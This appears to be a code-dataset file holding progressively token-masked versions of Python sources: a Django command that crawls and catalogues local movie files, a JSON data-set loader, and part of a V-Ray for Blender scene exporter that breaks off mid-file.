self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n\n\nclass Report:\n <function token>\n <function token>\n <function token>\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n\n def __init__(self, cmd, loop, aiohttp_session, report):\n self.command = cmd\n self.loop = loop\n self.aiohttp_session = aiohttp_session\n self.report = report\n self.movies = {m.path: m for m in Movie.objects.all()}\n self.resolver_set = ResolverSet(loop, aiohttp_session)\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n <function token>\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n\n def symlink(self, path):\n destination = os.path.join(settings.MEDIA_ROOT, 'films', os.path.\n basename(path))\n if os.path.islink(destination):\n os.remove(destination)\n os.symlink(path, destination)\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n <function token>\n\n def queue_update_tasks(self, movie_directory, tasks):\n path = movie_directory.path\n for dirname, subdirs, files in os.walk(path):\n for filename in files:\n name, ext = os.path.splitext(filename)\n path = os.path.join(dirname, filename)\n if ext not in MOVIES_EXT:\n self.message(self.command.style.WARNING(\n 'UNSUPPORTED EXTENSION %s' % ext), path)\n continue\n statinfo = os.stat(path)\n if statinfo.st_size < 256 * 2 ** 20:\n continue\n self.message(self.command.style.WARNING('SAMPLE'), path)\n tasks.append(asyncio.ensure_future(self.handle_file(name,\n path)))\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n <function token>\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n <function token>\n <function token>\n\n def message(self, tag, message):\n try:\n self.command.stdout.write('[ {:^40} ] {}'.format(tag, message))\n except UnicodeEncodeError:\n pass\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n <function token>\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n\n\nclass Crawler:\n <function token>\n <function token>\n <function token>\n\n async def handle_file(self, name, path):\n if path in self.movies.keys():\n if not settings.ALLOW_DB_UPDATE:\n return\n movie = self.movies[path]\n update = True\n else:\n movie = Movie()\n update = False\n movie = await self.resolver_set.resolve(path, movie)\n if not movie.poster:\n self.message(self.command.style.NOTICE('NO POSTER'), path)\n else:\n self.report.poster += 1\n self.report.success += 1\n movie.path = path\n await sync_to_async(movie.save)()\n if not update:\n await sync_to_async(NewMovieNotification.notify_all)(movie)\n self.symlink(path)\n self.message(self.command.style.SUCCESS('ADDED'), '%s as %s' %\n (path, movie.title))\n else:\n self.message(self.command.style.SUCCESS('UPDATED'), '%s as %s' %\n (path, movie.title))\n <function token>\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Command(BaseCommand):\n help = 'Update local movie list'\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Command(BaseCommand):\n <assignment token>\n\n def handle(self, *args, **options):\n report = Report()\n report.start()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n connector = aiohttp.TCPConnector(limit=settings.AIOHTTP_LIMIT,\n force_close=True, loop=loop)\n aiohttp_session = aiohttp.ClientSession(loop=loop, connector=connector)\n tasks = []\n crawler = Crawler(self, loop, aiohttp_session, report)\n for directory in MovieDirectory.objects.all():\n crawler.queue_update_tasks(directory, tasks)\n if tasks:\n loop.run_until_complete(asyncio.wait(tasks))\n loop.run_until_complete(aiohttp_session.close())\n loop.close()\n Movie.objects.filter(path='').delete()\n report.display()\n",
"<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass Command(BaseCommand):\n <assignment token>\n <function token>\n",
"<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n"
] | false |
99,820 | 7943f4c2e30820ae53f1f4c36473ad5497bd09c6 | """Provide a method of accessing data from the data sets
This should deal with issues such as relative file paths breaking and
define the most up to date data set to run tests on
"""
import json
from os import path
DNAME = path.dirname(path.abspath(__file__))
DATA_SET_DIRECTORY_ABSPATH = path.join(DNAME, "data_set")
LATEST = "items-7_17_1-en_US_pretty.json"
LATEST_DATA_SET_PATH = path.join(DATA_SET_DIRECTORY_ABSPATH, LATEST)
def load_data(filepath=None):
"""Load the items from a json file into a dict"""
if filepath is None:
filepath = LATEST_DATA_SET_PATH
with open(filepath) as file:
return json.load(file)
def save_data(data_set, filepath, pretty=False):
"""Save the data set.
If pretty is specified, make the file human readable."""
with open(filepath, "w") as file:
if pretty:
file.write(
json.dumps(data_set, indent=4, sort_keys=True))
else:
file.write(
json.dumps(data_set, separators=(',', ':'), sort_keys=True))
| [
"\"\"\"Provide a method of accessing data from the data sets\r\n\r\nThis should deal with issues such as relative file paths breaking and\r\ndefine the most up to date data set to run tests on\r\n\r\n\"\"\"\r\nimport json\r\n\r\nfrom os import path\r\n\r\n\r\nDNAME = path.dirname(path.abspath(__file__))\r\nDATA_SET_DIRECTORY_ABSPATH = path.join(DNAME, \"data_set\")\r\n\r\nLATEST = \"items-7_17_1-en_US_pretty.json\"\r\nLATEST_DATA_SET_PATH = path.join(DATA_SET_DIRECTORY_ABSPATH, LATEST)\r\n\r\n\r\ndef load_data(filepath=None):\r\n \"\"\"Load the items from a json file into a dict\"\"\"\r\n if filepath is None:\r\n filepath = LATEST_DATA_SET_PATH\r\n\r\n with open(filepath) as file:\r\n return json.load(file)\r\n\r\n\r\ndef save_data(data_set, filepath, pretty=False):\r\n \"\"\"Save the data set.\r\n \r\n If pretty is specified, make the file human readable.\"\"\"\r\n with open(filepath, \"w\") as file:\r\n if pretty:\r\n file.write(\r\n json.dumps(data_set, indent=4, sort_keys=True))\r\n else:\r\n file.write(\r\n json.dumps(data_set, separators=(',', ':'), sort_keys=True))\r\n",
"<docstring token>\nimport json\nfrom os import path\nDNAME = path.dirname(path.abspath(__file__))\nDATA_SET_DIRECTORY_ABSPATH = path.join(DNAME, 'data_set')\nLATEST = 'items-7_17_1-en_US_pretty.json'\nLATEST_DATA_SET_PATH = path.join(DATA_SET_DIRECTORY_ABSPATH, LATEST)\n\n\ndef load_data(filepath=None):\n \"\"\"Load the items from a json file into a dict\"\"\"\n if filepath is None:\n filepath = LATEST_DATA_SET_PATH\n with open(filepath) as file:\n return json.load(file)\n\n\ndef save_data(data_set, filepath, pretty=False):\n \"\"\"Save the data set.\n \n If pretty is specified, make the file human readable.\"\"\"\n with open(filepath, 'w') as file:\n if pretty:\n file.write(json.dumps(data_set, indent=4, sort_keys=True))\n else:\n file.write(json.dumps(data_set, separators=(',', ':'),\n sort_keys=True))\n",
"<docstring token>\n<import token>\nDNAME = path.dirname(path.abspath(__file__))\nDATA_SET_DIRECTORY_ABSPATH = path.join(DNAME, 'data_set')\nLATEST = 'items-7_17_1-en_US_pretty.json'\nLATEST_DATA_SET_PATH = path.join(DATA_SET_DIRECTORY_ABSPATH, LATEST)\n\n\ndef load_data(filepath=None):\n \"\"\"Load the items from a json file into a dict\"\"\"\n if filepath is None:\n filepath = LATEST_DATA_SET_PATH\n with open(filepath) as file:\n return json.load(file)\n\n\ndef save_data(data_set, filepath, pretty=False):\n \"\"\"Save the data set.\n \n If pretty is specified, make the file human readable.\"\"\"\n with open(filepath, 'w') as file:\n if pretty:\n file.write(json.dumps(data_set, indent=4, sort_keys=True))\n else:\n file.write(json.dumps(data_set, separators=(',', ':'),\n sort_keys=True))\n",
"<docstring token>\n<import token>\n<assignment token>\n\n\ndef load_data(filepath=None):\n \"\"\"Load the items from a json file into a dict\"\"\"\n if filepath is None:\n filepath = LATEST_DATA_SET_PATH\n with open(filepath) as file:\n return json.load(file)\n\n\ndef save_data(data_set, filepath, pretty=False):\n \"\"\"Save the data set.\n \n If pretty is specified, make the file human readable.\"\"\"\n with open(filepath, 'w') as file:\n if pretty:\n file.write(json.dumps(data_set, indent=4, sort_keys=True))\n else:\n file.write(json.dumps(data_set, separators=(',', ':'),\n sort_keys=True))\n",
"<docstring token>\n<import token>\n<assignment token>\n\n\ndef load_data(filepath=None):\n \"\"\"Load the items from a json file into a dict\"\"\"\n if filepath is None:\n filepath = LATEST_DATA_SET_PATH\n with open(filepath) as file:\n return json.load(file)\n\n\n<function token>\n",
"<docstring token>\n<import token>\n<assignment token>\n<function token>\n<function token>\n"
] | false |
99,821 | 55b1113b643adcc6cf6fb3c2702490b105c3703c | #
# V-Ray For Blender
#
# http://chaosgroup.com
#
# Author: Andrei Izrantcev
# E-Mail: [email protected]
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# All Rights Reserved. V-Ray(R) is a registered trademark of Chaos Software.
#
import os
import time
import datetime
import bpy
from vb30.lib.VRayStream import VRayExportFiles
from vb30.lib.VRayStream import VRayPluginExporter
from vb30.lib.VRayStream import VRayFilePaths
from vb30.lib import SysUtils, BlenderUtils
from vb30.nodes import export as NodesExport
from vb30.exporting import exp_init
from vb30.exporting import exp_settings
from vb30.exporting import exp_channels
from vb30.exporting import exp_frame
from vb30.exporting import exp_run
from vb30.exporting import exp_anim_full
from vb30.exporting import exp_anim_camera_loop
from vb30 import debug
HAS_VB35 = SysUtils.hasRtExporter()
if HAS_VB35:
import _vray_for_blender_rt
@debug.TimeIt
def Export(bus, scene, engine, isPreview=False):
o = bus['output']
VRayScene = scene.vray
VRayExporter = VRayScene.Exporter
ts = time.time()
o.write('MAIN', "\n")
o.write('MAIN', SysUtils.GetVRsceneTemplate("defaults.vrscene"))
if VRayExporter.draft:
o.write('MAIN', "\n")
o.write('MAIN', SysUtils.GetVRsceneTemplate("draft.vrscene"))
exp_channels.ExportRenderElements(bus)
if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:
err = exp_frame.ExportSingleFrame(bus)
elif VRayExporter.animation_mode == 'CAMERA_LOOP':
err = exp_anim_camera_loop.ExportCameraLoop(bus)
else:
err = exp_anim_full.ExportAnimation(bus,
scene.frame_start,
scene.frame_end,
scene.frame_step
)
if VRayScene.Includer.use:
if VRayScene.Includer.use:
o.write('MAIN', "\n// Include additional *.vrscene files")
for includeFile in VRayScene.Includer.nodes:
if not includeFile.use:
continue
filepath = BlenderUtils.GetFullFilepath(includeFile.scene)
o.write('MAIN', '\n#include "%s" // %s' % (filepath, includeFile.name))
o.write('MAIN', '\n')
# No need for interpolate() anymore
o.setAnimation(False)
exp_settings.ExportSettings(bus)
te = time.time() - ts
td = datetime.timedelta(seconds=te)
d = datetime.datetime(1,1,1) + td
if not bus['preview']:
debug.PrintMsg("Export done [%.2i:%.2i:%.2i]" % (d.hour, d.minute, d.second))
return err
def ExportEx(bus):
debug.Debug("ExportEx()")
err = None
scene = bus['scene']
engine = bus['engine']
o = bus['output']
VRayScene = scene.vray
VRayExporter = VRayScene.Exporter
pm = VRayFilePaths()
# Setting user defined value here
# It could be overriden in 'initFromScene'
# depending on VRayDR settings
pm.setSeparateFiles(VRayExporter.useSeparateFiles)
pm.initFromScene(engine, scene)
pm.printInfo()
fm = VRayExportFiles(pm)
fm.setOverwriteGeometry(VRayExporter.auto_meshes)
rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'
try:
fm.init(not rtExporter)
except Exception as e:
debug.ExceptionInfo(e)
return "Error initing files!"
o.setFileManager(fm)
o.setPreview(engine.is_preview)
if not rtExporter:
bus['exporter'] = exp_init.InitExporter(bus)
try:
# We do everything here basically because we want to close files
# if smth goes wrong...
if not rtExporter:
err = Export(bus, scene, engine, engine.is_preview)
else:
if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:
o.setAnimation(True)
o.setFrameStart(scene.frame_start)
o.setFrameEnd(scene.frame_end)
o.setFrameStep(scene.frame_step)
elif VRayExporter.animation_mode == 'CAMERA_LOOP':
cameraCount = len([1 for o in scene.objects if o.type == 'CAMERA' and o.data.vray.use_camera_loop])
o.setAnimation(True)
o.setFrameStart(1)
o.setFrameEnd(cameraCount)
o.setFrameStep(1)
init = {
'context' : bpy.context.as_pointer(),
'engine' : engine.as_pointer(),
'data' : bpy.data.as_pointer(),
'scene' : scene.as_pointer(),
'mainFile' : fm.getFilePathByPluginType('MAIN'),
'objectFile' : fm.getFilePathByPluginType('OBJECT'),
'envFile' : fm.getFilePathByPluginType('WORLD'),
'geometryFile' : fm.getFilePathByPluginType('GEOMETRY'),
'lightsFile' : fm.getFilePathByPluginType('LIGHT'),
'materialFile' : fm.getFilePathByPluginType('MATERIAL'),
'textureFile' : fm.getFilePathByPluginType('TEXTURE'),
'cameraFile' : fm.getFilePathByPluginType('CAMERA'),
}
# Free anything we have
if engine.renderer:
del engine.renderer
renderer = _vray_for_blender_rt.init(**init)
if renderer:
setattr(engine, 'renderer', renderer)
_vray_for_blender_rt.render(renderer)
except Exception as e:
debug.ExceptionInfo(e)
err = str(e)
finally:
exp_init.ShutdownExporter(bus)
return err
def ExportAndRun(engine, scene):
if engine.test_break():
return "Export is interrupted!"
VRayScene = scene.vray
o = VRayPluginExporter()
bus = {
'output' : o,
'engine' : engine,
'scene' : scene,
'camera' : scene.camera,
'skipObjects' : set(),
'environment_volume' : set(),
'gizmos' : set(),
'preview' : engine.is_preview,
# Used to pass nodes into plugin exporter
# to access some special data like "fake" textures
'context' : {
'node' : None,
},
'cache' : {
'plugins' : set(),
'mesh' : set(),
},
'defaults' : {
'brdf' : "BRDFNOBRDFISSET",
'material' : "MANOMATERIALISSET",
'texture' : "TENOTEXTUREIESSET",
'uvwgen' : "DEFAULTUVWC",
'blend' : "TEDefaultBlend",
},
}
if bus['camera'].type != 'CAMERA':
return "Scene's active camera is not of type camera"
err = ExportEx(bus)
if err is not None:
return err
err = exp_run.RunEx(bus)
if err is not None:
return err
return None
# First check the animation type:
#
# 'FRAMEBYFRAME' "Export and render frame by frame"
# 'FULL' "Export full animation range then render"
# 'NOTMESHES' "Export full animation range without meshes"
# 'CAMERA' "Export full animation of camera motion"
#
# 'FRAMEBYFRAME' should also support exporting of 2 (or more) frames at once for correct motion blur
#
def RenderScene(engine, scene):
VRayScene = scene.vray
VRayExporter = VRayScene.Exporter
err = None
if VRayExporter.animation_mode == 'FRAMEBYFRAME':
# Store current frame
selected_frame = scene.frame_current
f = scene.frame_start
while(f <= scene.frame_end):
scene.frame_set(f)
err = ExportAndRun(engine, scene)
if err is not None:
break
f += scene.frame_step
# Restore selected frame
scene.frame_set(selected_frame)
else:
err = ExportAndRun(engine, scene)
return err
| [
"#\n# V-Ray For Blender\n#\n# http://chaosgroup.com\n#\n# Author: Andrei Izrantcev\n# E-Mail: [email protected]\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n# All Rights Reserved. V-Ray(R) is a registered trademark of Chaos Software.\n#\n\nimport os\nimport time\nimport datetime\n\nimport bpy\n\nfrom vb30.lib.VRayStream import VRayExportFiles\nfrom vb30.lib.VRayStream import VRayPluginExporter\nfrom vb30.lib.VRayStream import VRayFilePaths\n\nfrom vb30.lib import SysUtils, BlenderUtils\n\nfrom vb30.nodes import export as NodesExport\n\nfrom vb30.exporting import exp_init\nfrom vb30.exporting import exp_settings\nfrom vb30.exporting import exp_channels\nfrom vb30.exporting import exp_frame\nfrom vb30.exporting import exp_run\nfrom vb30.exporting import exp_anim_full\nfrom vb30.exporting import exp_anim_camera_loop\n\nfrom vb30 import debug\n\nHAS_VB35 = SysUtils.hasRtExporter()\nif HAS_VB35:\n import _vray_for_blender_rt\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n\n ts = time.time()\n\n o.write('MAIN', \"\\n\")\n o.write('MAIN', SysUtils.GetVRsceneTemplate(\"defaults.vrscene\"))\n\n if VRayExporter.draft:\n o.write('MAIN', \"\\n\")\n o.write('MAIN', SysUtils.GetVRsceneTemplate(\"draft.vrscene\"))\n\n exp_channels.ExportRenderElements(bus)\n\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n\n else:\n err = exp_anim_full.ExportAnimation(bus,\n scene.frame_start,\n scene.frame_end,\n scene.frame_step\n )\n\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', \"\\n// Include additional *.vrscene files\")\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath, includeFile.name))\n o.write('MAIN', '\\n')\n\n # No need for interpolate() anymore\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1,1,1) + td\n\n if not bus['preview']:\n debug.PrintMsg(\"Export done [%.2i:%.2i:%.2i]\" % (d.hour, d.minute, d.second))\n\n return err\n\n\ndef ExportEx(bus):\n debug.Debug(\"ExportEx()\")\n\n err = None\n\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n\n pm = VRayFilePaths()\n\n # Setting user defined value here\n # It could be overriden in 'initFromScene'\n # depending on VRayDR settings\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n\n pm.initFromScene(engine, scene)\n pm.printInfo()\n\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return \"Error initing files!\"\n\n o.setFileManager(fm)\n 